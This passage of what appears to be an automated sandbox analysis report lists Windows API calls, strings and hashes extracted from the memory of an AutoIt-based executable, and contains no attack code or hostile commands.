                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Similarity
                                                              • API ID: Exception@8Throwstd::exception::exception
                                                              • String ID:
                                                              • API String ID: 3728558374-0
                                                              APIs
                                                              • SetTextColor.GDI32(?,00000000), ref: 00B1D2DB
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00B1D30C
                                                              • GetSysColor.USER32(0000000F), ref: 00B1D318
                                                              • SetBkColor.GDI32(?,000000FF), ref: 00B1D332
                                                              • SelectObject.GDI32(?,00000000), ref: 00B1D341
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00B1D36C
                                                              • GetSysColor.USER32(00000010), ref: 00B1D374
                                                              • CreateSolidBrush.GDI32(00000000), ref: 00B1D37B
                                                              • FrameRect.USER32(?,?,00000000), ref: 00B1D38A
                                                              • DeleteObject.GDI32(00000000), ref: 00B1D391
                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 00B1D3DC
                                                              • FillRect.USER32(?,?,00000000), ref: 00B1D40E
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00B1D439
                                                                • Part of subcall function 00B1D575: GetSysColor.USER32(00000012), ref: 00B1D5AE
                                                                • Part of subcall function 00B1D575: SetTextColor.GDI32(?,?), ref: 00B1D5B2
                                                                • Part of subcall function 00B1D575: GetSysColorBrush.USER32(0000000F), ref: 00B1D5C8
                                                                • Part of subcall function 00B1D575: GetSysColor.USER32(0000000F), ref: 00B1D5D3
                                                                • Part of subcall function 00B1D575: GetSysColor.USER32(00000011), ref: 00B1D5F0
                                                                • Part of subcall function 00B1D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B1D5FE
                                                                • Part of subcall function 00B1D575: SelectObject.GDI32(?,00000000), ref: 00B1D60F
                                                                • Part of subcall function 00B1D575: SetBkColor.GDI32(?,00000000), ref: 00B1D618
                                                                • Part of subcall function 00B1D575: SelectObject.GDI32(?,?), ref: 00B1D625
                                                                • Part of subcall function 00B1D575: InflateRect.USER32(?,000000FF,000000FF), ref: 00B1D644
                                                                • Part of subcall function 00B1D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B1D65B
                                                                • Part of subcall function 00B1D575: GetWindowLongW.USER32(00000000,000000F0), ref: 00B1D670
                                                                • Part of subcall function 00B1D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B1D698
                                                              Similarity
                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 3521893082-0
                                                              APIs
                                                              • DestroyWindow.USER32 ref: 00ACB98B
                                                              • DeleteObject.GDI32(00000000), ref: 00ACB9CD
                                                              • DeleteObject.GDI32(00000000), ref: 00ACB9D8
                                                              • DestroyIcon.USER32(00000000), ref: 00ACB9E3
                                                              • DestroyWindow.USER32(00000000), ref: 00ACB9EE
                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 00B2D2AA
                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B2D2E3
                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00B2D711
                                                                • Part of subcall function 00ACB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00ACB759,?,00000000,?,?,?,?,00ACB72B,00000000,?), ref: 00ACBA58
                                                              • SendMessageW.USER32 ref: 00B2D758
                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B2D76F
                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 00B2D785
                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 00B2D790
                                                              Strings
                                                              Similarity
                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                              • String ID: 0
                                                              • API String ID: 464785882-4108050209
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 00AFDBD6
                                                              • GetDriveTypeW.KERNEL32(?,00B4DC54,?,\\.\,00B4DC00), ref: 00AFDCC3
                                                              • SetErrorMode.KERNEL32(00000000,00B4DC54,?,\\.\,00B4DC00), ref: 00AFDE29
                                                              Strings
                                                              Similarity
                                                              • API ID: ErrorMode$DriveType
                                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                              • API String ID: 2907320926-4222207086
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                              • API String ID: 1038674560-86951937
                                                              APIs
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00B1C788
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00B1C83E
                                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 00B1C859
                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00B1CB15
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$Window
                                                              • String ID: 0
                                                              • API String ID: 2326795674-4108050209
                                                              • Opcode ID: c0caa1496fea23b4a8e63a486afbbc4991ab3bdc3e6683aec8db2c1494b883a0
                                                              • Instruction ID: e53847de662bd3ff27b8e40c08398d4a1f7d81167c2efe16222b345c9dc91c0f
                                                              • Opcode Fuzzy Hash: c0caa1496fea23b4a8e63a486afbbc4991ab3bdc3e6683aec8db2c1494b883a0
                                                              • Instruction Fuzzy Hash: 95F1C071288305AFD7218F28C886BEABFE4FF49754F540969F598D62A1C774CD80CB91
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?,00B4DC00), ref: 00B16449
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                              • API String ID: 3964851224-45149045
                                                              • Opcode ID: 94e07f3bfa44199f1396e8e0b1be7500db631d03bdf32b541924d67703dafa8f
                                                              • Instruction ID: f334877f54431faae9bd797204a65e4e66ecc404e27c602b441f911f6b829faa
                                                              • Opcode Fuzzy Hash: 94e07f3bfa44199f1396e8e0b1be7500db631d03bdf32b541924d67703dafa8f
                                                              • Instruction Fuzzy Hash: ACC190302086458BCB04EF10C691EEE77E5AF95344F54489DF8965B3E3DB20ED8ACB92
                                                              APIs
                                                              • GetSysColor.USER32(00000012), ref: 00B1D5AE
                                                              • SetTextColor.GDI32(?,?), ref: 00B1D5B2
                                                              • GetSysColorBrush.USER32(0000000F), ref: 00B1D5C8
                                                              • GetSysColor.USER32(0000000F), ref: 00B1D5D3
                                                              • CreateSolidBrush.GDI32(?), ref: 00B1D5D8
                                                              • GetSysColor.USER32(00000011), ref: 00B1D5F0
                                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B1D5FE
                                                              • SelectObject.GDI32(?,00000000), ref: 00B1D60F
                                                              • SetBkColor.GDI32(?,00000000), ref: 00B1D618
                                                              • SelectObject.GDI32(?,?), ref: 00B1D625
                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 00B1D644
                                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B1D65B
                                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00B1D670
                                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B1D698
                                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B1D6BF
                                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 00B1D6DD
                                                              • DrawFocusRect.USER32(?,?), ref: 00B1D6E8
                                                              • GetSysColor.USER32(00000011), ref: 00B1D6F6
                                                              • SetTextColor.GDI32(?,00000000), ref: 00B1D6FE
                                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B1D712
                                                              • SelectObject.GDI32(?,00B1D2A5), ref: 00B1D729
                                                              • DeleteObject.GDI32(?), ref: 00B1D734
                                                              • SelectObject.GDI32(?,?), ref: 00B1D73A
                                                              • DeleteObject.GDI32(?), ref: 00B1D73F
                                                              • SetTextColor.GDI32(?,?), ref: 00B1D745
                                                              • SetBkColor.GDI32(?,?), ref: 00B1D74F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                              • String ID:
                                                              • API String ID: 1996641542-0
                                                              • Opcode ID: 718742826c61a76a208e8366de1d6ba53e6a1bf26fc52cd1f5ee4a4530d605db
                                                              • Instruction ID: 84abbddfeb70643ec18d2e32dd495b242badedb0776a631568e6282bb9e9d7d9
                                                              • Opcode Fuzzy Hash: 718742826c61a76a208e8366de1d6ba53e6a1bf26fc52cd1f5ee4a4530d605db
                                                              • Instruction Fuzzy Hash: AC513C71900218AFDF109FA4EC48EEE7BBAFB08320F214555F915AB2A1DB719A40DF50
                                                              APIs
                                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B1B7B0
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B1B7C1
                                                              • CharNextW.USER32(0000014E), ref: 00B1B7F0
                                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B1B831
                                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B1B847
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B1B858
                                                              • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B1B875
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00B1B8C7
                                                              • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B1B8DD
                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B1B90E
                                                              • _memset.LIBCMT ref: 00B1B933
                                                              • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B1B97C
                                                              • _memset.LIBCMT ref: 00B1B9DB
                                                              • SendMessageW.USER32 ref: 00B1BA05
                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B1BA5D
                                                              • SendMessageW.USER32(?,0000133D,?,?), ref: 00B1BB0A
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00B1BB2C
                                                              • GetMenuItemInfoW.USER32(?), ref: 00B1BB76
                                                              • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B1BBA3
                                                              • DrawMenuBar.USER32(?), ref: 00B1BBB2
                                                              • SetWindowTextW.USER32(?,0000014E), ref: 00B1BBDA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                              • String ID: 0
                                                              • API String ID: 1073566785-4108050209
                                                              • Opcode ID: d3f1e47ccd456607473b874a03251f81ca7f113825f88fbb1eab52c89df97689
                                                              • Instruction ID: d3ff76f151faf11b116a61ad3fca4a35bea3d2ec5a30be966cba4e3a94d265f2
                                                              • Opcode Fuzzy Hash: d3f1e47ccd456607473b874a03251f81ca7f113825f88fbb1eab52c89df97689
                                                              • Instruction Fuzzy Hash: 13E19275900218AFDF109F65DC85EEE7BB8FF05710F50819AF919AB290DB748A81CF60
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 00B1778A
                                                              • GetDesktopWindow.USER32 ref: 00B1779F
                                                              • GetWindowRect.USER32(00000000), ref: 00B177A6
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00B17808
                                                              • DestroyWindow.USER32(?), ref: 00B17834
                                                              • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B1785D
                                                              • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B1787B
                                                              • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B178A1
                                                              • SendMessageW.USER32(?,00000421,?,?), ref: 00B178B6
                                                              • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B178C9
                                                              • IsWindowVisible.USER32(?), ref: 00B178E9
                                                              • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B17904
                                                              • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B17918
                                                              • GetWindowRect.USER32(?,?), ref: 00B17930
                                                              • MonitorFromPoint.USER32(?,?,00000002), ref: 00B17956
                                                              • GetMonitorInfoW.USER32 ref: 00B17970
                                                              • CopyRect.USER32(?,?), ref: 00B17987
                                                              • SendMessageW.USER32(?,00000412,00000000), ref: 00B179F2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                              • String ID: ($0$tooltips_class32
                                                              • API String ID: 698492251-4156429822
                                                              • Opcode ID: 444369a61ce49dd705d35e83c20b91149dc9429af70190a937ec0c04d3886749
                                                              • Instruction ID: 9b625c08742572a0e2d6445ddb501553d9e822e1b99e4a7b0ef3983ed210ff43
                                                              • Opcode Fuzzy Hash: 444369a61ce49dd705d35e83c20b91149dc9429af70190a937ec0c04d3886749
                                                              • Instruction Fuzzy Hash: 72B18B71648300AFDB04DF64C989BAEBBE5FF88310F40895DF5999B291DB70E844CB92
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00AF6CFB
                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00AF6D21
                                                              • _wcscpy.LIBCMT ref: 00AF6D4F
                                                              • _wcscmp.LIBCMT ref: 00AF6D5A
                                                              • _wcscat.LIBCMT ref: 00AF6D70
                                                              • _wcsstr.LIBCMT ref: 00AF6D7B
                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00AF6D97
                                                              • _wcscat.LIBCMT ref: 00AF6DE0
                                                              • _wcscat.LIBCMT ref: 00AF6DE7
                                                              • _wcsncpy.LIBCMT ref: 00AF6E12
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                              • API String ID: 699586101-1459072770
                                                              • Opcode ID: 95b40efcf83b627ed7e22ca3c590f1cf8262572ce6d9f2e735d2d4482eec9a6f
                                                              • Instruction ID: 284fa7bfeda7cbafa2792e9669a3e6636aef8e2b68715c5d1089d668b728c772
                                                              • Opcode Fuzzy Hash: 95b40efcf83b627ed7e22ca3c590f1cf8262572ce6d9f2e735d2d4482eec9a6f
                                                              • Instruction Fuzzy Hash: 1941E972A04214BFEB04AB74DE47FBF77BCDF45710F14005AFA02A6292EB75DA019661
                                                              APIs
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00ACA939
                                                              • GetSystemMetrics.USER32(00000007), ref: 00ACA941
                                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00ACA96C
                                                              • GetSystemMetrics.USER32(00000008), ref: 00ACA974
                                                              • GetSystemMetrics.USER32(00000004), ref: 00ACA999
                                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00ACA9B6
                                                              • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00ACA9C6
                                                              • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00ACA9F9
                                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00ACAA0D
                                                              • GetClientRect.USER32(00000000,000000FF), ref: 00ACAA2B
                                                              • GetStockObject.GDI32(00000011), ref: 00ACAA47
                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00ACAA52
                                                                • Part of subcall function 00ACB63C: GetCursorPos.USER32(000000FF), ref: 00ACB64F
                                                                • Part of subcall function 00ACB63C: ScreenToClient.USER32(00000000,000000FF), ref: 00ACB66C
                                                                • Part of subcall function 00ACB63C: GetAsyncKeyState.USER32(00000001), ref: 00ACB691
                                                                • Part of subcall function 00ACB63C: GetAsyncKeyState.USER32(00000002), ref: 00ACB69F
                                                              • SetTimer.USER32(00000000,00000000,00000028,00ACAB87), ref: 00ACAA79
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                              • String ID: AutoIt v3 GUI
                                                              • API String ID: 1458621304-248962490
                                                              • Opcode ID: 65a17ade05214036999f0cbb7a2253d0f40592f9ec73bd59988b95c3ff5512c1
                                                              • Instruction ID: 4c2b4d6c3b7bfc08c8a153ff9f61607b0fc33b05b8d32cdc44ab6c4b5eacc101
                                                              • Opcode Fuzzy Hash: 65a17ade05214036999f0cbb7a2253d0f40592f9ec73bd59988b95c3ff5512c1
                                                              • Instruction Fuzzy Hash: 63B15D71A0020A9FDB14DFA8ED46FAE7BB4FB18314F124219FA19A7290DB74D841CB61
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Window$Foreground
                                                              • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                              • API String ID: 62970417-1919597938
                                                              • Opcode ID: 13cd7c699e8f42c63d5115acef6180ba6d74eefd23907d57c779e2e847467ac3
                                                              • Instruction ID: 873d2673711218c0d924024bd6c53951e7100fe79e9304cb7f2e3df574c0d5e2
                                                              • Opcode Fuzzy Hash: 13cd7c699e8f42c63d5115acef6180ba6d74eefd23907d57c779e2e847467ac3
                                                              • Instruction Fuzzy Hash: 48D1D731108642EFCB04EF20D681AAABBF4FF54344F104A5DF45A971A2DB34E99ACB91
                                                              APIs
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B13735
                                                              • RegCreateKeyExW.ADVAPI32(?,?,00000000,00B4DC00,00000000,?,00000000,?,?), ref: 00B137A3
                                                              • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B137EB
                                                              • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B13874
                                                              • RegCloseKey.ADVAPI32(?), ref: 00B13B94
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00B13BA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                              • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                              • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Close$ConnectCreateRegistryValue
                                                              • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                              APIs
                                                              • CharUpperBuffW.USER32(?,?), ref: 00B16C56
                                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B16D16
                                                              Strings
                                                              Similarity
                                                              • API ID: BuffCharMessageSendUpper
                                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                              APIs
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00AECF91
                                                              • __swprintf.LIBCMT ref: 00AED032
                                                              • _wcscmp.LIBCMT ref: 00AED045
                                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00AED09A
                                                              • _wcscmp.LIBCMT ref: 00AED0D6
                                                              • GetClassNameW.USER32(?,?,00000400), ref: 00AED10D
                                                              • GetDlgCtrlID.USER32(?), ref: 00AED15F
                                                              • GetWindowRect.USER32(?,?), ref: 00AED195
                                                              • GetParent.USER32(?), ref: 00AED1B3
                                                              • ScreenToClient.USER32(00000000), ref: 00AED1BA
                                                              • GetClassNameW.USER32(?,?,00000100), ref: 00AED234
                                                              • _wcscmp.LIBCMT ref: 00AED248
                                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00AED26E
                                                              • _wcscmp.LIBCMT ref: 00AED282
                                                              Strings
                                                              Similarity
                                                              • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                              • String ID: %s%u
                                                              APIs
                                                              • GetClassNameW.USER32(00000008,?,00000400), ref: 00AED8EB
                                                              • _wcscmp.LIBCMT ref: 00AED8FC
                                                              • GetWindowTextW.USER32(00000001,?,00000400), ref: 00AED924
                                                              • CharUpperBuffW.USER32(?,00000000), ref: 00AED941
                                                              • _wcscmp.LIBCMT ref: 00AED95F
                                                              • _wcsstr.LIBCMT ref: 00AED970
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00AED9A8
                                                              • _wcscmp.LIBCMT ref: 00AED9B8
                                                              • GetWindowTextW.USER32(00000002,?,00000400), ref: 00AED9DF
                                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00AEDA28
                                                              • _wcscmp.LIBCMT ref: 00AEDA38
                                                              • GetClassNameW.USER32(00000010,?,00000400), ref: 00AEDA60
                                                              • GetWindowRect.USER32(00000004,?), ref: 00AEDAC9
                                                              Strings
                                                              Similarity
                                                              • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                              • String ID: @$ThumbnailClass
                                                              APIs
                                                              Strings
                                                              Similarity
                                                              • API ID: __wcsnicmp
                                                              • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                              APIs
                                                              • LoadIconW.USER32(00000063), ref: 00AEEAB0
                                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00AEEAC2
                                                              • SetWindowTextW.USER32(?,?), ref: 00AEEAD9
                                                              • GetDlgItem.USER32(?,000003EA), ref: 00AEEAEE
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00AEEAF4
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00AEEB04
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00AEEB0A
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00AEEB2B
                                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00AEEB45
                                                              • GetWindowRect.USER32(?,?), ref: 00AEEB4E
                                                              • SetWindowTextW.USER32(?,?), ref: 00AEEBB9
                                                              • GetDesktopWindow.USER32 ref: 00AEEBBF
                                                              • GetWindowRect.USER32(00000000), ref: 00AEEBC6
                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00AEEC12
                                                              • GetClientRect.USER32(?,?), ref: 00AEEC1F
                                                              • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00AEEC44
                                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00AEEC6F
                                                              Similarity
